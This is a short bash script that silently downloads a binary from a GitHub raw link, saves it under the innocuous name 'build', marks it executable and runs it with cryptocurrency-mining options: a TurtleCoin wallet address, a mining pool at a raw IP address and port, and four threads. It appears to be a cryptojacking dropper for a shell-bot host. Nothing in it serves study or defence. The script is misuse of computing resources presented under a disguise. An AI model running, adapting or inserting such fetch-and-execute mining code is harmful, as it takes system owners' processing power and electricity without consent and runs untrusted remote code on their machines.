#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home/shell-bot
wget -qO build https://github.com/Omarjetos/ezz/blob/master/nano?raw=true
chmod +x build
./build -a argon2/chukwav2 -o 137.184.3.159:2112 -u TRTLuztCtzxAoe6Tm1ABPf5HpKB3joh4jZSUhyrMV7Q7i1ARasJiweEhvV8YhRJKxbRPrqsfMnYPcJeikJ47NMCy5vJoTYnBDFo.tes -p x -nicehash true -t 4
